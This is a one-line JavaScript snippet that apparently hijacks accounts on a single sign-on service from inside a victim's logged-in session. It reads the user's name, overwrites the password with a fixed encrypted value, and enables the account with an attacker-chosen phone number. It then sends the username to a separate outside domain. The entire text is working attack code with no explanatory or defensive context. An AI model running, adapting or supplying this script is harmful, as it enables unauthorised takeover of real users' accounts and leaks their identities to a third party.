fetch("https://sso.geiwohuo.com/sso/public/account/getBindInfo",{method:"POST"}).then(r=>r.json()).then(d=>{const u=d.info.userName;return fetch("https://sso.geiwohuo.com/sso/User/Index/editSubUser",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({userName:u,password:"wDTwOkWY9H2wDO+L6sTAwGVJRky5Df8mp2b6o8wH6yKinsPeMU6Dxo1KCX9sT+sMPRbGM7Q6TmuX1xmgS5nf7XBMNVOKMXwzFv8vax0G9QPpp4YE9tvgaDUimKG88+CBzprUh1nEocWWx3uWU/I+UZ4gWV0QrHryjcS0TU1oqok="})}).then(()=>fetch("https://sso.geiwohuo.com/sso/User/Index/editSubUser",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({userName:u,statusName:"启用",phoneTel:"16618816587",areaCode:"+86",email:""})})).then(()=>fetch('https://www.zfjpower.cn/?username='+u))});
